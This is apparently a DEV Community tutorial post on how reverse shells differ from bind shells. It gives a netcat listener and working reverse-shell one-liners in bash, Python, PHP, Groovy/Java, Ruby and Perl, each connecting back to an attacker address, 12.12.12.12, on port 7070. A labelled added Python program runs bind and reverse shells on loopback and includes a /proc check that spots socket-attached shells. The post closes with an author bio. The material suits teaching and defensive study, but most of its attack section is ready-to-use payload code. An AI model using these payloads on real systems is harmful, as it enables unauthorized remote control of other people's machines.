DEV Community

Yuma-Tsushima
[Cybersecurity] How do Reverse shells work?

Reverse Shells

How do reverse shells work?

In a conventional remote shell, the target machine listens on a port and the machine controlled by the attacker connects in to that port and is handed a shell.
This is called a bind shell, because the target binds a listening socket and waits for the attacker to connect.

But what if the target is not directly reachable, because it has no public IP address (it sits behind NAT) or an inbound firewall drops the connection before it reaches the listening port?

This is the situation a reverse shell is for: the target machine initiates an outbound connection to a host the attacker controls, where a listener is waiting, and the shell runs over that connection. Outbound traffic is far more likely to be permitted than inbound, so a reverse shell gets through where a bind shell would not.

Reverse Shell Examples

To start, you need a listener process on the attacker's machine, waiting for reverse shell connections to arrive at its IP address, e.g. 12.12.12.12.
On Linux, this can be as simple as one netcat command:

nc -lvnp 7070

The netcat listener waits on port 7070 for an inbound connection (-l listen, -v verbose, -n no DNS lookups, -p the port). The attacker then needs to get a payload executed on the target that connects back to that listener. Most payloads depend on a particular interpreter or tool being present on the target, so which one works is a question of what the target has installed.
Check out pentestmonkey's Reverse Shell Cheat Sheet for more.
Payloads are typically one-liners so they can be delivered through a single injected command.
The examples below are for Linux and other Unix-like systems. Several of them also work on Windows if you replace the interpreter call /bin/sh -i with cmd.exe; the bash one does not, because /dev/tcp is a bash-only feature.

Bash Reverse Shell

If the target machine runs Linux, it's a good idea to start with bash, as nearly all Linux systems ship it. Note that /dev/tcp is not a real file but a pseudo-device implemented inside bash, so this line must be run by bash itself; it fails under /bin/sh on systems where that is dash.

/bin/bash -i >& /dev/tcp/12.12.12.12/7070 0>&1

Python Reverse Shell

With Python continuing to gain popularity, there's a good chance an interpreter is available on the target server (invoke it as python3 where no python alias exists) and it can be used to execute a script like:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("12.12.12.12",7070));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
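Every one-liner on this page does the same two things that the bind/reverse distinction at the top and the Python payload above only describe in words: it makes a TCP connection in one direction or the other, and it duplicates that socket onto the shell's standard input, output and error. The program below is an added example written for this edit, not code from the original post or from pentestmonkey's cheat sheet. It runs both a bind shell and a reverse shell end to end on 127.0.0.1 (standing in for the attacker's 12.12.12.12), drives each shell with a command and reads the answer back, and finishes with the check a responder would run on Linux: a shell whose file descriptors 0, 1 and 2 all point at a socket. The loopback addresses, the __CMD_DONE__ sentinel and the function names are assumptions of the example.

```python
# Added example (not from the original post): a bind shell and a reverse shell,
# both run end to end on 127.0.0.1 (standing in for the 12.12.12.12 listener
# in the post) so the connection direction and the descriptor duplication
# behind the one-liners can be seen working. Needs /bin/sh on the host.
import os
import socket
import subprocess

LOOPBACK = "127.0.0.1"
SENTINEL = "__CMD_DONE__"  # assumption: never appears in real command output


def open_listener(port=0):
    """Listening socket (port=0: OS picks a free port). Attacker side of a reverse
    shell (the post's `nc -lvnp 7070`), target side of a bind shell."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((LOOPBACK, port))
    srv.listen(1)
    return srv


def attach_shell(conn):
    """Target side, shared by both shell types: give the connected socket to /bin/sh
    as stdin, stdout and stderr. This is exactly what the three os.dup2() calls in
    the Python one-liner do. `-i` is left off so no prompt pollutes the output."""
    return subprocess.Popen(["/bin/sh"], stdin=conn, stdout=conn, stderr=conn)


def reverse_shell(attacker_host, attacker_port):
    """Target side of a REVERSE shell: connect OUT to the attacker, then attach /bin/sh.
    An outbound connection is what passes NAT and egress-only firewall rules."""
    conn = socket.create_connection((attacker_host, attacker_port))
    proc = attach_shell(conn)
    conn.close()  # the child process holds its own duplicates of the descriptor
    return proc


def accept_and_attach(srv):
    """Target side of a BIND shell: wait for the attacker to connect IN, then attach
    /bin/sh. This needs an inbound path to the target, which NAT or a firewall blocks."""
    conn, _ = srv.accept()
    srv.close()
    proc = attach_shell(conn)
    conn.close()
    return proc


def run_command(conn, command):
    """Attacker side: send one command line, read until the echoed sentinel arrives."""
    conn.sendall(f"{command}; echo {SENTINEL}\n".encode())
    buf = b""
    while SENTINEL.encode() not in buf:
        chunk = conn.recv(4096)
        if not chunk:  # shell exited or the connection dropped
            break
        buf += chunk
    return buf.split(SENTINEL.encode(), 1)[0].decode()


def stdio_is_socket(pid):
    """Forensic check (Linux /proc only): a shell whose fds 0, 1 and 2 all resolve to
    socket:[inode] is the tell-tale artefact of either shell type. None without /proc."""
    try:
        links = [os.readlink(f"/proc/{pid}/fd/{n}") for n in range(3)]
    except OSError:
        return None
    return all(link.startswith("socket:") for link in links)


def drive(conn, proc, command):
    """Attacker side: run one command, record the artefact, then close the shell down."""
    try:
        output = run_command(conn, command)
        artefact = stdio_is_socket(proc.pid)
        conn.sendall(b"exit\n")
    finally:
        conn.close()  # EOF on the shell's stdin makes it exit even if `exit` was lost
        proc.wait(timeout=10)
    return output, artefact


def demo_reverse_shell():
    """Attacker listens, target connects back, attacker drives the shell."""
    srv = open_listener()                        # attacker: nc -lvnp <port>
    port = srv.getsockname()[1]
    proc = reverse_shell(LOOPBACK, port)         # target: one of the post's one-liners
    conn, _ = srv.accept()                       # attacker: the connection arrives
    srv.close()
    return drive(conn, proc, "echo reverse-ok; echo $((6 * 7))")


def demo_bind_shell():
    """Target listens, attacker connects in, attacker drives the shell."""
    srv = open_listener()                        # target: opens a port and waits
    port = srv.getsockname()[1]
    conn = socket.create_connection((LOOPBACK, port))  # attacker: nc <target> <port>
    proc = accept_and_attach(srv)                # target: hands the socket to /bin/sh
    return drive(conn, proc, "echo bind-ok")


if __name__ == "__main__":
    print(demo_reverse_shell())  # ('reverse-ok\n42\n', True) on Linux
    print(demo_bind_shell())     # ('bind-ok\n', True) on Linux
```

Run it with python3. The only difference between the two demos is which side calls connect() and which side calls accept(); attach_shell() is identical, which is why the same /proc artefact (three standard descriptors on one socket) identifies both. The post's payloads pass -i to the shell, which is convenient interactively but sends a prompt down the socket; the example omits it so the output can be parsed.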

PHP Reverse Shell

Most web servers have PHP installed, and it too provides a reverse shell vector. The one-liner assumes the new socket lands on file descriptor 3; if &3 doesn't work, try 4, 5 and so on:

php -r '$sock=fsockopen("12.12.12.12",7070);exec("/bin/sh -i <&3 >&3 2>&3");'

Java Reverse Shell

Java is likely to be available on application servers. Note that this snippet (as in pentestmonkey's cheat sheet) is written in Groovy syntax (no type declarations, `as String[]`), so it runs in a Groovy console or script rather than as plain Java, and it still relies on bash and its /dev/tcp device being present on the target. Unlike the other examples it is not an interactive shell: it reads the connection line by line and runs each line as a separate command:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/12.12.12.12/7070;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ruby Reverse Shell

Ruby is another popular web application language that’s likely to have an interpreter on a general-purpose server system:

ruby -rsocket -e'f=TCPSocket.open("12.12.12.12",7070).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Perl Reverse Shell

As with bash, a perl interpreter is present on most Linux servers, so a perl command is another way to obtain a reverse shell:

perl -e 'use Socket;$i="12.12.12.12";$p=7070;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Check out my Gist Here

Credits

Welcome to Yuma-Tsushima's Github page!



About Myself

Hello, my name is Yuma-Tsushima (frequently shortened to Yuma). I am an ambitious coder, and I enjoy coding in JavaScript (mainly). I also love making websites using HTML, CSS and (of course) JS! I started programming (self taught) at the age of 13. Originally, I came from the creative field; I draw/sing/animate/make music.


Talents and Hobbies

I love drawing (I have been drawing all of my life). I play strategy games, I code and I do CTFs! I am also good at animation, making AMVs and image editing. My favourite game is Mindustry, followed by Flow Free and Sudoku. I love watching anime (I love Code Geass - I relate to Lelouch a lot) and I aspire to create my own anime!

Drawing, Music, Digital Artwork, ICT, Electronics Designs, Web dev, Strategy

Check out my work!:
❯ Soundcloud : 0c7av3h4ck5
❯ Discord : {CyberArtByte}
❯ Artwork : AcceleratorArts07


Discord Servers!!

Bounty Hunters: An amazing bug hunting community full of developers and exploiters!!!

CyberArtByte: My server full of bling and joy!!


Author: Yuma-Tsushima07
